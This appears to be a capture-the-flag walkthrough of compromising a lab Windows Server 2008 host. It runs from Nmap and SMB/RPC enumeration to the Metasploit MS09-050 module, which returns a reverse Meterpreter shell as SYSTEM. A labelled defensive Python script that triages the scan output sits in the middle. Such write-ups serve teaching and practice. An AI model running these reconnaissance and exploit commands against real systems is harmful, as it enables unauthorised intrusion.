Initial Reconnaissance
We begin by conducting a full Nmap scan to identify open ports and running services on the target machine. It’s important to scan all 65,535 TCP ports to ensure nothing is missed.
sudo nmap -Pn -n 192.168.113.40 -sC -sV -p- --open -v
Flag Breakdown:
- -Pn: Skips host discovery and assumes the host is online.
- -n: Prevents DNS resolution to speed up the scan.
- -sC: Runs default Nmap scripts for common checks.
- -sV: Attempts to determine service versions.
- -p-: Scans all TCP ports from 1 to 65535.
- --open: Only displays ports that are confirmed to be open.
- -v: Enables verbose output for more detail.
Nmap Results:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.0.6001 (17714650)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info:
| Target_Name: INTERNAL
| NetBIOS_Domain_Name: INTERNAL
| NetBIOS_Computer_Name: INTERNAL
| DNS_Domain_Name: internal
| DNS_Computer_Name: internal
| Product_Version: 6.0.6001
|_ System_Time: 2025-07-22T07:04:29+00:00
|_ssl-date: 2025-07-22T07:04:38+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=internal
| Issuer: commonName=internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-01-05T19:52:51
| Not valid after: 2025-07-07T19:52:51
| MD5: 7c2b:85a9:1fe2:c264:4be8:ed3e:e16b:274a
|_SHA-1: 05e9:c5e9:7ac6:242e:0a18:ca56:e1b5:1c38:31db:d393
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
Host script results:
| smb2-time:
| date: 2025-07-22T07:04:29
|_ start_date: 2025-02-20T21:30:47
| nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:19:d7 (VMware)
| Names:
| INTERNAL<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ INTERNAL<20> Flags: <unique><active>
|_clock-skew: mean: 1h23m59s, deviation: 3h07m50s, median: -1s
| smb-os-discovery:
| OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: internal
| NetBIOS computer name: INTERNAL\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-07-22T00:04:29-07:00
| smb2-security-mode:
| 2:0:2:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Nmap Output Highlights:
Open TCP ports:
- 53 - Microsoft DNS
- 135 - Microsoft RPC
- 139, 445 - NetBIOS/SMB file sharing services
- 3389 - Remote Desktop Protocol (RDP)
- 5357 - HTTP API (Web Services on Devices)
- 49152–49158 - Dynamic ports used by Microsoft RPC
Service information confirms the host is running Windows Server 2008 Standard SP1 and is part of the INTERNAL domain.
Hostname and System Info:
- Hostname: internal
- Domain: internal
- Workgroup: WORKGROUP
- OS Version: Windows Server 2008 SP1
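As an added defender-side example (not part of the original write-up), the following Python turns the security-relevant lines of the Nmap output above into triage findings: SMB signing state, guest access, the end-of-support OS version, and the expired SHA-1 RDP certificate. The excerpt and the scan timestamp are constructed from the output shown on this page.

```python
import re
from datetime import datetime

# Constructed excerpt of the Nmap output shown above (not a live scan).
NMAP_OUTPUT = """\
3389/tcp open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=internal
| Signature Algorithm: sha1WithRSAEncryption
| Not valid after: 2025-07-07T19:52:51
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
| smb2-security-mode:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""
# Scan time taken from the ssl-date line of the output above.
SCAN_TIME = datetime(2025, 7, 22, 7, 4, 38)


def triage_nmap(text, scan_time):
    """Map security-relevant Nmap script lines to (severity, finding) tuples."""
    findings = []
    # SMB1 signing off: sessions can be tampered with or relayed.
    if re.search(r"message_signing:\s*disabled", text):
        findings.append(("high", "SMB message signing disabled"))
    # SMB2 signing optional: clients that do not sign remain relayable.
    if "Message signing enabled but not required" in text:
        findings.append(("medium", "SMB2 signing enabled but not required"))
    # Null/guest sessions allow unauthenticated enumeration attempts.
    if re.search(r"account_used:\s*guest", text):
        findings.append(("medium", "SMB guest/null session accepted"))
    # Server 2008 is out of support; confirm MS09-050 and later SMB fixes.
    if "Windows Server (R) 2008" in text:
        findings.append(("high", "Windows Server 2008 (end of support, check MS09-050)"))
    # RDP certificate checks: expiry relative to scan time and weak signature.
    m = re.search(r"Not valid after:\s*(\S+)", text)
    if m:
        expires = datetime.fromisoformat(m.group(1))
        if expires < scan_time:
            findings.append(("low", f"RDP certificate expired on {expires.date()}"))
    if "sha1WithRSAEncryption" in text:
        findings.append(("low", "RDP certificate signed with SHA-1"))
    return findings


def triage_page_scan():
    """Run the triage over the constructed excerpt with the page's scan time."""
    return triage_nmap(NMAP_OUTPUT, SCAN_TIME)
```

Running triage_page_scan() yields six findings for this host; the same function applied to a host whose scan shows signing required and a current certificate returns an empty list.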
Next, it is a good practice to run a top UDP port scan:
sudo nmap -Pn -n 192.168.113.40 -sU --top-ports=100 --reason
UDP scans often reveal services such as SNMP or DNS running over UDP. While this particular scan returned no useful results, it is still worth running every time.
Let’s add the hostname internal to our local /etc/hosts file for convenience:
sudo nano /etc/hosts
# Add:
# 192.168.113.40 internal
Port Analysis and Enumeration
Port 53 - DNS
We try a zone transfer to enumerate subdomains and internal hostnames. A successful zone transfer can reveal valuable internal names.
dig @192.168.113.40 axfr internal
Result: the zone transfer failed, which is expected unless the server is misconfigured.
Port 135 - Microsoft RPC
We attempt to connect using rpcclient, which allows interaction with the Windows RPC service.
rpcclient -U '' -N 192.168.113.40
- -U '': Empty username (anonymous login)
- -N: No password required
Connection succeeds! You can press Tab twice to see the available commands.
We use the following to enumerate domain users:
enumdomusers
This may return a list of usernames from the domain, which could be useful for password attacks or other enumeration.
Result: Access Denied.
Ports 139 and 445 - SMB
We start by gathering basic information using:
enum4linux 192.168.113.40
This tool combines multiple enumeration techniques (like NetBIOS, RPC, and SMB). We do not get any useful information. The only indication of a connection is from enum4linux.
We follow up with:
smbclient -N -L \\\\192.168.113.40\\
This lists available shares on the target. In this case, nothing is accessible via anonymous login.
Port 3389 - Remote Desktop Protocol (RDP)
Although we don’t yet have credentials, we test if RDP is accessible.
rdesktop internal
The server prompts us with certificate warnings. Click through to view the login screen. Sometimes usernames are visible depending on the RDP configuration. Also, check the Ease of Access options on the login screen. Some privilege escalation techniques exploit this functionality if the system is vulnerable.
Port 5357 - HTTPAPI (Web Services on Devices)
This is where things get interesting. A quick Google search shows that port 5357 is associated with WSDAPI on Windows and has a known vulnerability.
One of the top results points to a Microsoft Security Bulletin (MS09-050), which affects Windows Server 2008, our target OS.
We find a relevant Exploit-DB entry and even a Metasploit module:
- Exploit Title: ms09_050_smb2_negotiate_func_index
- Affected: Windows Vista / Server 2008 with SMB2 enabled
Gaining Initial Access
Given the above, we proceed using the Metasploit Framework.
msfconsole
We will use module 0 (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):
use 0
Check required options:
show options
Set the required parameters and run the exploit:
set lhost tun0
set rhosts 192.168.113.40
run
If successful, you’ll get a Meterpreter session. Switch to a regular shell for further interaction:
shell
We now have access to the target system as nt authority\system.
Capturing the Flag
The flag is located on the Administrator’s Desktop.